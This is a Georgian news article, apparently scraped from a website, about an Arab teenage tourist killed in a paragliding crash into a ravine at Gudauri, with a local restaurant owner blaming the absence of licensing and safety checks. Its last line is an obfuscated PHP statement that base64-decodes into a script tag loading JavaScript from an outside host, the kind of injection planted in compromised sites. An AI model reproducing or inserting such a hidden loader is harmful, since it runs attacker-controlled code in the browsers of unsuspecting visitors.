celsiusi
ავერსი საქკაბელი
გუდაურში, პარაპლანის ხევში ჩავარდნის შედეგად არაბი ტურისტი დაიღუპა. ადგილობრივების ინფორმაციით, მოზარდი ამოყვანის დროს უკვე გარდაცვლილი იყო. 
 
მომხდართან დაკავშირებით ამბობენ, რომ პარაშუტის ყველა თოკი არ ჰქონდა სწორად დალაგებული და ის პირდაპირ ხევში ჩავარდა.  ჰოსტელის მეპატრონე "მთავარ არხს" უყვება, რომ ფრენის არანაირი ლიცენზია ან რეგულაცია არ არსებობს და შესაბამისად, არც უსაფრთხოების მონიტორინგი ხდება. 
 
"ჩვენი ქართველი, მოხევე პარაპლანისტს, პარაშუტის ყველა თოკი არ ჰქონდა სწორად დალაგებული და აფრენა ვერ შეძლო და პირდაპირ ჩავარდა ხრამში. ტურისტი ბავშვი არაბი არის გარდაცვლილი და თვითონაც ძაან მძიმე მდგომარეობაშია. ეს იმის ბრალია, რომ საქართველოში არ არსებობს არანაირი არც ლიცენზია, არაფერი, პროსტა ფრინავენ, რომ ფული ბევრი იშოვონ. ერთი გადმოხტომა ღირს 300 ლარი და ფულის საჭრელ მანქანად აქვთ გადაქცეული"- ამბობს რესტორან "მთვრალი ალუბლის"  მეპატრონე. 
 
მეორე ახალგაზრდას გადარჩენა მაშველებმა შეძლეს, თუმცა მისი მდგომარეობა მძიმეა და სასწრაფო დახმარების ბრიგადამ ის სამედიცინო დაწესებულებაში გადაიყვანა.
603
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");